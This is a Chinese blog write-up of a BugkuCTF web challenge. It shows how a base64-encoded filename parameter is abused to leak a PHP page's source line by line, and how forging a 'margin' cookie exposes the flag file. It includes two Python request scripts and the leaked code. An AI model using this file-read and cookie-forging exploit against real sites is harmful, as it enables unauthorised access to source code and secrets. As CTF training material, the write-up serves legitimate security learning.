BugkuCTF:cookies欺骗(web)

最新推荐文章于 2023-09-14 22:49:40 发布
最新推荐文章于 2023-09-14 22:49:40 发布
阅读量2.7k 收藏 5
点赞数 4
CC 4.0 BY-SA版权
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/changer_WE/article/details/88978647
本文通过分析一个PHP网站的漏洞,展示了如何利用源码泄露获取关键信息。通过构造特定请求并设置Cookie,最终成功读取隐藏的Flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • 题目描述:

      点开链接,给了一串字符,这里只是一部分:

      rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaiheg

  • Burp抓包,发现没什么效果:

              

  • 思路

但,包里面的 GET /web11/index.php?line=&filename=a2V5cy50eHQ= HTTP/1.1  中的  a2V5cy50eHQ=  引起我的注意,base64解码一下,之后发现是 key.txt ,试了试在浏览器端直接访问http://123.206.87.240:8002/web11/key.txt,但是它与一开始的题目描述里的内容并无区别,然后,思路有点断了,之后看看别的博客,才注意到这个逻辑,php解析的时候 line 表示的是行号,filename是对于文件内容的读取,所以,直接构造一个逻辑矛盾,让filename去读自己即读index.php,既然key.txt是被编码过的,那么这里的index.php也要base64编码一下,之后报错,取line=1,相应的URL是:

http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw

报错结果,直接性的源码泄露:              

                   

 

  • 写个脚本自动读个几十行: 
    import requests
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"
mysession = requests.session()
for i in range(0, 40):
    r = mysession.get(url1+str(i)+url2)
    print(r.text)

     

  • 读取结果: 
    <?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); //表示有filename的话获取其内容,没有的话就赋值为空
$line=isset($_GET['line'])?intval($_GET['line']):0;  //line有值直接获取,无值赋值为0
if($file=='') 
header("location:index.php?line=&filename=a2V5cy50eHQ=");    //设置我们看到的URL
$file_list = array(    //关联型数组
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){//接下来的指示,cookie中的margin参数要设置,且要等于'margin'
$file_list[2]='keys.php';    //在数组中加入keys.php,这应该存着flag
}
if(in_array($file, $file_list)){//看我们传入的filename的值是否在上面的数组中
$fa = file($file);    //是则以文件的方式打开
echo $fa[$line];      //按line行号,输出
}
?>

大概意思是:要把cookie中设置margin参数为'margin'且要修改filename是keys.php的base64编码的内容,即可获取flag

  • 使用Burpsuite,抓到包后发送到Repeater:

                   

  • 或者可以写个脚本:
import requests
url = "http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy5waHA="  # filename替换为keys.php的base64加密后的内容
mysession = requests.session()
cookies = {'margin': 'margin'}
r = mysession.post(url, cookies=cookies)
print(r.text)

 

知识点:

  • int intval ( mixed $var [, int $base = 10 ] )
    用于获取变量的整数值,$var:要转换成 integer 的数量值,$base:转化所使用的进制
    intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。
  • php array分为两类:关联性(类似python字典),数值型(正常)
  • in_array(search,array,type)
    要搜索的数据,要搜索的数组,数据的类型(可选。如果设置该参数为 true,则检查搜索的数据与数组的值的类型是否相同。)
    search参数在php4之后就可以是数组类型了
  • file(path,include_path,context)    把整个文件读入一个数组中
    path规定要读取的文件
    include_path可选。如果也想在 include_path 中搜寻文件的话,可以将该参数设为 "1"
    context规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL,则忽略
  • 与_COOKIE['xxx']对应的是  setcookie(name, value, expire, path, domain);
     
【CTF bugku cookies】关于cookie篡改、PHP代码审计
zw05011的博客
01-14 1041
知识点 cookie cookie 常用于识别用户。cookie 是一种服务器留在用户计算机上的小文件。每当同一台计算机通过浏览器请求页面时,这台计算机将会发送 cookie。通过 PHP,您能够创建并取回 cookie 的值。 在PHP中,利用setcookie()函数可以创建和修改Cookie,以及设置Cookie的有效期;而使用$_COOKIE[]数组可以读取Cookie变量的值。 setcookie(name,value[,exprie,path,domain,secure]);//创建Co
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 7064
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTF cookies欺骗
3tu6b0rn的博客
05-14 663
页面中乱码 源代码也没有 只有url中有一串类似于base64 说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw 改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了 import requests a=30 for i in range(a): url="http://120.24.86....
Bugkuctf web cookie欺骗
Amire0x的小乐园
05-07 736
题目链接 又有新东西啦 打开 发现没啥用,查看源码也没什么 注意到URL上有一串类似base64编码的东西 解码 习惯性访问一下 那下面又该咋办呢??? URL里filename有参数,line没有参数 要不试一试价格参数? line=1,啥都没有 注意到filename 的参数是base64编码后的 那再把1,2,3编码一波试试? 又回去了啥都没有。。。 懵逼中。。。 看了一下别人的write...
CTFHUB-HTTP协议()------Cookie
Y4tacker的博客
07-22 9306
通过分析题意,可以看出应该是需要伪造cookie 打开网页:在F12网页请求当中发现Set-Cookie:admin:0字样 通过BURP拦截:猜想admin=0应该是一个状态改成1试一下 通过Repeater重放器放包得到flag
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 779
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
BUUCTF WEB COOKIE STORE
qq_41696858的博客
05-13 244
emmmm…自从buuctf变为K8S管理以后,靶场就出现了各种非预期解,这题就是典型了吧 我第一遍刷的时候这题还涉及到反序列化,现在属于是纯粹的一个base64编码,改cookie题了 ok,废话少说,打开场景,发现买flag的逻辑,抓包,发现买三种产品的cookie不同,cookie里的session像是base64编码 解码,发现直接是money和history。。。。。。。。。。。。我直接改了不成嘛 补一个这题原先的考点,pickle反序列化和__reduce__魔法方法(更正一下,我好像和pick
BugkuWeb题目解析
热门推荐
北观止的博客
07-31 1万+
BugkuWeb 1.web2 解析: 源码中有注释 答案: KEY{Web-2-bugKssNNikls9100} 2、计算器 题目出现了一个很简单的验证码,只要输入正确就可以获得flag,但是尝试后发现题目的输入框只能输入一个数字, 果断审查元素,发现了输入框的最大长度被设置成了1,于是修改输入框的maxlength属性为5 输入结果就可以了 来自 https://www.cnblogs.com/kele1997/p/7595839.html flag{CTF-bugku-0032} 3.Web基础$
BugkuCTF-WEB题cookie欺骗
am_03的博客
08-29 1197
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2223
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 419
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
BugkuCTF web 输入密码查看flag——never give up
the_world_go的博客
04-06 1083
输入密码查看flag 看到要输入密码(爆破爆破爆破)。 打开bp抓包。爆破(果然弱密码) 输入密码得到 flag{bugku-baopo-hah} 点击一百万次好像网页崩了(也有可能我太菜了),进不去。。。 备份是个好习惯 打开网页,一段乱码。好的我看不懂,看源码没线索,抓包,没发现 拿御剑扫下后台吧 找到了 可以看到我要提交key1和key2,他们不相等但是md5处理以后相等 参考php漏洞...
IDF实验室-天罗地网-COOKIE欺骗-writeup
sn_RNA的专栏
04-22 6351
最近在学习ctf 从idf实验室上面遇到了一道题,通过同学和老师的帮助,最终解决了问题。google的时候没有看到这题的write up,那么就由我做第一个吧。 题目描述: COOKIE欺骗 这里这里→ http://ctf.idf.cn/game/web/40/index.php   打开所给的链接得到的网页里面有一个非常长的字符串,并不能猜测是什么样的编码方式
由一道CTF信息泄露题而引发的对git命令的再次温习
xiaotaode2012的专栏
08-17 6107
0x00写在前面的话 好久没有GIT了,git 功能强大,但是因为现在不要做项目所以基本开始没怎么用了。 0x01信息泄露 有的时候运维或者说是部署人员工,当然也有可能是开发人员在打包项目的时候将。git也打包了而引起了,git的信息泄露,关于常用的其他信息泄露,各位看官可自行Google or 百度。这里贴一下git信息泄露利用的python脚本。下载完了之后利用python执行,pyth
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2264
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
通过COOKIE欺骗登录网站后台
weixin_30908941的博客
03-09 1630
1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利...
CTF学习记录006-Cookie欺骗、认证、伪造
wupeng_ccab的博客
09-14 1382
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
cookie欺骗bugkuctf
最新发布
02-26
### 关于Cookie欺骗漏洞及其解决方案 #### Cookie欺骗概述 Cookie欺骗是指攻击者通过各种手段获取用户的敏感Cookie信息,并利用这些信息冒充合法用户访问受保护的Web应用。当COOKIE的HTTPOnly flag没有设置时,对于很多只依赖于cookie验证的网站来说存在较大风险[^1]。 #### CTF比赛中常见场景 在CTF竞赛环境中,参赛队伍可能会遇到涉及Cookie管理不当的应用程序。这类题目通常考察选手对Web安全的理解程度以及如何有效防护此类威胁的能力。例如,在某些情况下,如果开发者未能正确配置HttpOnly属性,则可能导致JavaScript能够读取并操控Cookies,从而被用来实施跨站脚本攻击(XSS),进而窃取会话令牌等重要数据[^2]。 #### 防护措施建议 为了防止Cookie欺骗的发生,应采取以下几种方法: - **启用 HttpOnly 属性**:确保所有的身份认证相关的 Cookies都设置了`HttpOnly`标志位,使得客户端脚本无法访问它们。 ```http Set-Cookie: sessionId=abcde; Path=/; Secure; HttpOnly; ``` - **采用 HTTPS 进行传输加密**:强制使用SSL/TLS连接来保障通信过程中的安全性,避免中间人劫持或篡改请求响应报文中携带的信息。 - **定期更新和轮转密钥材料**:缩短Session有效期的同时引入更复杂的随机数生成算法,增加破解难度。 - **实现严格的同源策略控制**:限制第三方站点加载资源或者发起跨域请求的可能性,减少潜在的风险暴露面。 #### 实战演练案例分析 假设在一个模拟环境下的CTF挑战里,给定了一款在线商城平台作为靶场对象。经过初步侦查发现该系统的登录接口存在明显的缺陷——即未开启上述提到的关键选项之一。此时可以通过构造恶意链接诱导受害者点击触发XSS事件,最终成功捕获到对方浏览器内的真实凭证。然而这只是第一步;后续还需要进一步挖掘其他逻辑错误点才能完成整个攻防流程的设计思路转换。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值